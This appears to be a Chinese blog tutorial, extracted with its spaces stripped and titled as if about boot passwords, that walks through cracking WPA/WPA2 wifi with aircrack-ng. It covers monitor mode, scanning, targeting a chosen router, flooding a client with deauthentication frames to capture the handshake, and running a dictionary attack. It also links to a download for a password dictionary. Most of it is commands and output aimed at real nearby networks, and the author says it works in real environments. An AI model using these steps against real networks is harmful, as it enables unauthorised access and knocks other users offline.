字典电脑开机密码破解

控企鹅|关注互联网安全|Linux博客www.
mrliangqicomQQ:48875531前言:Aircrack是破解WEP/WEA/WPA2加密的主流工具之一,前面讲过wifite,aircrack-ng套件包含的工具可以用户捕获数据包,握手验证,以及暴力破解和字典攻击.
关于无线密码的破解成功需要以下几点:首先成功捕捉到.
cap;需要一个强大的wifi密码破解字典,wifi超强密码破解字典,字典的大小决定了破解的成功率,字典下载(https://yunpan.
cn/cSAgLSBhScEJg访问密码4b05);最后就是需要一台跑密码词典的好电脑.
–Aircrack-ng无线密码破解–Aireplay-ng流量生成和客户端认证–Airodump-ng数据包捕获–Airbase-ng虚假接入点配置1,查看无线网络名称#ifocnfigwlan02,把无线网卡的模式改为混杂模式如果改为混杂模式有报错按照提示结束到影响的进程即可.
有些外置网卡不支持混合模式.
(经测试360wifi,百度wifi,腾讯wifi.
.
亲测水星MW150us支持或者)#airmon-ngstartwlan0PHYInterfaceDriverChipsetphy0wlan0rtl8723beRealtekSemiconductorCo.
,Ltd.
RTL8723BEPCIeWirelessNetworkAdapter(mac80211monitormodevifenabledfor[phy0]wlan0on[phy0]wlan0mon)(mac80211stationmodevifdisabledfor[phy0]wlan0)phy1wlan1rtl8192cuRealtekSemiconductorCorp.
RTL8188CUS802.
11nWLANAdapter3,查看是否设置成为了混杂模式,成功后网卡模式为wlan0mon#ifocnfigwlan0mon4,扫描wifi信号#airodump-ngwlan0mon控企鹅|关注互联网安全|Linux博客www.
mrliangqicomQQ:48875531CH5][Elapsed:18s][2016-05-1323:42BSSIDPWRBeacons#Data,#/sCHMBENCCIPHERAUTHESSID30:FC:68:73:61:74-73400154e.
WPA2CCMPPSKssssssssssssss40:16:9F:5A:1E:0A-10007-100:25:86:4B:7A:52-545000654e.
WPA2CCMPPSKoxya2809EC:26:CA:EB:5C:12-5254001154e.
WPA2CCMPPSKTP-LINK_FFC0CC:34:29:2D:A1:F6-495610654e.
WPA2CCMPPSKa4056C:59:40:90:50:C4-6362640654e.
WPA2CCMPPSKLUO14:75:90:EF:B4:68-653210654e.
WPA2CCMPPSKChen8C:F2:28:AA:CE:22-644400154e.
WPA2CCMPPSKCMCC-EDU30:FC:68:1E:FF:C0-683800154e.
WPA2CCMPPSKTP-LINK_FFC0D0:0F:6D:30:A5:3B-6933001254eWPA2CCMPPSKChinaNet-NRvE5C:63:BF:5D:FA:36-662400654e.
WPA2CCMPPSKa40600:0A:EB:40:20:2C-701200154eWPACCMPPSKTopwa3C:46:D8:0B:8E:95-702200154e.
WPA2CCMPPSKPSQ8C:F2:28:A9:DE:EE-7111001154e.
WPA2CCMPPSKA404FC:D7:33:37:BF:DE-72900154e.
WPA2CCMPPSKyujianxiang603D0:FA:1D:62:7A:80-73700154eWPA2CCMPPSKChenLeWangZhou5,选择目标AP#airodump-ng-wLUO-c11--bssid6C:59:40:90:50:C4wlan0mon-wLUO:-w后面是指定wifi的名称-c11:-c是信道号,CH对应的数字--bssid:bssid为wifi名称对应的路由器mac地址wlan0mon:开启混合模式的网卡名称CH6][Elapsed:3mins][2016-05-1323:58][WPAhandshake:6C:59:40:90:50:BSSIDPWRRXQBeacons#Data,#/sCHMBENCCIPHERAUTHE6C:59:40:90:50:C4-57011804831654e.
WPA2CCMPPSKL控企鹅|关注互联网安全|Linux博客www.
mrliangqicomQQ:48875531BSSIDSTATIONPWRRateLostFramesProbe6C:59:40:90:50:C4AC:F7:F3:5E:A5:93-11e-004416C:59:40:90:50:C4D0:A6:37:AD:90:C7-611e-24265266C:59:40:90:50:C4B4:30:52:A0:66:EA-11e-0016C:59:40:90:50:C4BC:44:86:60:F1:4C-11e-0016,重新打开一个终端,(第五步的终端一直都不能关,否则就捕获不到握手数据包了.
)模拟该路由器下的用户对路由器发送认证数据包.
这时候看第五步的数据包会不断增加.
直到掉线之后重启,就会重新抓取握手包.
#aireplay-ng-010-a6C:59:40:90:50:C4-cD0:A6:37:AD:90:C7wlan0mon-010:发送10次认证和数据库消息-a->6C:59:40:90:50:C4BSSID路由器对应的mac地址-c->D0:A6:37:AD:90:C7STATION客户端对应的mac地址23:56:21Waitingforbeaconframe(BSSID:6C:59:40:90:50:C4)onchannel623:56:21Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|65ACKs]23:56:22Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|53ACKs]23:56:23Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|68ACKs]23:56:23Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|42ACKs]23:56:24Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|80ACKs]23:56:24Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|61ACKs]23:56:25Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|55ACKs]23:56:26Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|69ACKs]23:56:26Sending64directedDeAuth.
STMAC:[D0:A6:37:AD:90:C7][0|42ACKs]23:56:27Sending64directed^CAuth.
STMAC:[D0:A6:37:AD:90:C7][0|34ACKs]7,握手包破解#aircrack-ng-wpassword.
txtLUO-0*1.
cap-w:password.
txt为密码字典LUP-0*.
CAP:捕获数据包所存放的几个文件OpeningLUO-01.
capRead548packets.
Nonetworksfound,exiting.
控企鹅|关注互联网安全|Linux博客www.
mrliangqicomQQ:48875531Quittingaircrack-ng.
.
.
该文是用于学习测试,并没有真正抓取握手包.
成功与否靠强大的字典和运气了,以上方法适用于真实环境中的wifi破解.